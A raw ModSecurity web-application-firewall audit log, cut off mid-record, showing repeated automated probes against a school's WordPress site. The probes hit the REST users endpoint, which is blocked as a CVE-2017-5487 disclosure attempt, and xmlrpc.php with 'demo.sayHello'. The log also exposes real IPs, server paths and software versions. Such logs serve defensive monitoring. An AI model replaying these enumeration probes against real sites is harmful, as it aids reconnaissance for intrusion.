1747425934861432 4789; combined=3649, p1=422, p2=3018, p3=27, p4=25, p5=91, sr=66, sw=66, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --83dcf14f-Z-- --6ebf4a75-A-- [17/May/2025:03:05:45 +0700] aCeamdhEtho3ciA0weheUQAAAIo 103.236.140.4 54568 103.236.140.4 8181 --6ebf4a75-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.202.94 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.202.94 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --6ebf4a75-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6ebf4a75-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747425945122301 2868 (- - -) Stopwatch2: 1747425945122301 2868; combined=1283, p1=426, p2=826, p3=0, p4=0, p5=30, sr=74, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6ebf4a75-Z-- --b177b434-A-- [17/May/2025:03:05:50 +0700] aCeanthEtho3ciA0weheUgAAAJA 103.236.140.4 54572 103.236.140.4 8181 --b177b434-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.202.94 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.202.94 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --b177b434-C-- demo.sayHello --b177b434-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --b177b434-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747425950812570 5954 (- - -) Stopwatch2: 1747425950812570 5954; combined=4320, p1=556, p2=3538, p3=33, p4=36, p5=93, sr=83, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b177b434-Z-- --e5cc8d7f-A-- [17/May/2025:03:05:55 +0700] aCeao9hEtho3ciA0weheVQAAAI8 103.236.140.4 54586 103.236.140.4 8181 --e5cc8d7f-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.249.137.6 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.137.6 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --e5cc8d7f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e5cc8d7f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747425955771215 2778 (- - -) Stopwatch2: 1747425955771215 2778; combined=1273, p1=419, p2=824, p3=0, p4=0, p5=30, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e5cc8d7f-Z-- --8cb21b5f-A-- [17/May/2025:03:06:02 +0700] aCeaqthEtho3ciA0weheWAAAAIE 103.236.140.4 54592 103.236.140.4 8181 --8cb21b5f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.249.137.6 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.137.6 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --8cb21b5f-C-- demo.sayHello --8cb21b5f-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --8cb21b5f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747425962234231 5782 (- - -) Stopwatch2: 1747425962234231 5782; combined=4319, p1=548, p2=3546, p3=33, p4=38, p5=91, sr=76, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8cb21b5f-Z-- --dfef1253-A-- [17/May/2025:03:06:02 +0700] aCeaqkE0LfP59mkCzg42BgAAAMQ 103.236.140.4 54594 103.236.140.4 8181 --dfef1253-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.114.182 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.114.182 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --dfef1253-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --dfef1253-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747425962726677 14843 (- - -) Stopwatch2: 1747425962726677 14843; combined=25747, p1=413, p2=774, p3=0, p4=0, p5=12294, sr=78, sw=0, l=0, gc=12266 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dfef1253-Z-- --7ed9fe1d-A-- [17/May/2025:03:06:09 +0700] aCeasdhEtho3ciA0weheWgAAAJQ 103.236.140.4 54600 103.236.140.4 8181 --7ed9fe1d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.114.182 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.114.182 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --7ed9fe1d-C-- demo.sayHello --7ed9fe1d-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --7ed9fe1d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747425969084892 5817 (- - -) Stopwatch2: 1747425969084892 5817; combined=4232, p1=523, p2=3452, p3=28, p4=31, p5=128, sr=74, sw=70, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7ed9fe1d-Z-- --91e30b21-A-- [17/May/2025:03:06:17 +0700] aCeaudhEtho3ciA0weheXAAAAJg 103.236.140.4 54604 103.236.140.4 8181 --91e30b21-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.98.108 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.98.108 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --91e30b21-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --91e30b21-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747425977875804 2969 (- - -) Stopwatch2: 1747425977875804 2969; combined=1246, p1=451, p2=767, p3=0, p4=0, p5=28, sr=70, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --91e30b21-Z-- --3fd2586c-A-- [17/May/2025:03:06:22 +0700] aCeavthEtho3ciA0weheXgAAAIM 103.236.140.4 54608 103.236.140.4 8181 --3fd2586c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.249.56.58 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.56.58 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --3fd2586c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3fd2586c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747425982455743 2029 (- - -) Stopwatch2: 1747425982455743 2029; combined=1014, p1=322, p2=665, p3=0, p4=0, p5=27, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3fd2586c-Z-- --d0d4e46b-A-- [17/May/2025:03:06:23 +0700] aCeav9e6THFz1hsaJaLZQQAAAAo 103.236.140.4 54610 103.236.140.4 8181 --d0d4e46b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.98.108 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.98.108 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --d0d4e46b-C-- demo.sayHello --d0d4e46b-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --d0d4e46b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747425983400425 4958 (- - -) Stopwatch2: 1747425983400425 4958; combined=3761, p1=454, p2=3096, p3=24, p4=28, p5=92, sr=65, sw=67, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d0d4e46b-Z-- --d74ac949-A-- [17/May/2025:03:06:26 +0700] aCeawthEtho3ciA0weheYQAAAIk 103.236.140.4 54616 103.236.140.4 8181 --d74ac949-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.86.203 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.86.203 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --d74ac949-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d74ac949-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747425986728179 2122 (- - -) Stopwatch2: 1747425986728179 2122; combined=1025, p1=340, p2=654, p3=0, p4=0, p5=31, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d74ac949-Z-- --9dfce56a-A-- [17/May/2025:03:06:26 +0700] aCeawthEtho3ciA0weheYgAAAIc 103.236.140.4 54618 103.236.140.4 8181 --9dfce56a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.249.56.58 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.56.58 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --9dfce56a-C-- demo.sayHello --9dfce56a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --9dfce56a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747425986728213 4450 (- - -) Stopwatch2: 1747425986728213 4450; combined=3440, p1=411, p2=2825, p3=26, p4=31, p5=86, sr=67, sw=61, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9dfce56a-Z-- --d30ffc22-A-- [17/May/2025:03:06:32 +0700] aCeayNhEtho3ciA0weheZQAAAIs 103.236.140.4 54624 103.236.140.4 8181 --d30ffc22-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.86.203 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.86.203 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --d30ffc22-C-- demo.sayHello --d30ffc22-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --d30ffc22-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747425992938538 6655 (- - -) Stopwatch2: 1747425992938538 6655; combined=4701, p1=585, p2=3863, p3=37, p4=42, p5=102, sr=77, sw=72, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d30ffc22-Z-- --bb637165-A-- [17/May/2025:03:06:42 +0700] aCea0thEtho3ciA0weheZwAAAI8 103.236.140.4 54628 103.236.140.4 8181 --bb637165-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.214.1.39 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.214.1.39 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --bb637165-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bb637165-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747426002966445 2765 (- - -) Stopwatch2: 1747426002966445 2765; combined=1272, p1=424, p2=818, p3=0, p4=0, p5=30, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bb637165-Z-- --4603fe17-A-- [17/May/2025:03:06:48 +0700] aCea2NhEtho3ciA0weheaQAAAIw 103.236.140.4 54632 103.236.140.4 8181 --4603fe17-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.214.1.39 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.214.1.39 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --4603fe17-C-- demo.sayHello --4603fe17-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --4603fe17-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747426008041372 4709 (- - -) Stopwatch2: 1747426008041372 4709; combined=3693, p1=428, p2=3053, p3=29, p4=32, p5=89, sr=68, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4603fe17-Z-- --9c067e3d-A-- [17/May/2025:03:06:58 +0700] aCea4thEtho3ciA0weheawAAAIE 103.236.140.4 54636 103.236.140.4 8181 --9c067e3d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.33.98 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.33.98 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --9c067e3d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9c067e3d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747426018386478 2370 (- - -) Stopwatch2: 1747426018386478 2370; combined=1160, p1=361, p2=770, p3=0, p4=0, p5=29, sr=70, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9c067e3d-Z-- --da15de2f-A-- [17/May/2025:03:07:03 +0700] aCea59hEtho3ciA0wehebAAAAI0 103.236.140.4 54640 103.236.140.4 8181 --da15de2f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.33.98 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.33.98 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --da15de2f-C-- demo.sayHello --da15de2f-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --da15de2f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747426023968346 6042 (- - -) Stopwatch2: 1747426023968346 6042; combined=4387, p1=526, p2=3627, p3=31, p4=37, p5=98, sr=74, sw=68, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --da15de2f-Z-- --a792983a-A-- [17/May/2025:03:07:27 +0700] aCea_9hEtho3ciA0wehebwAAAJg 103.236.140.4 54646 103.236.140.4 8181 --a792983a-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.89.174 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.89.174 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --a792983a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a792983a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag 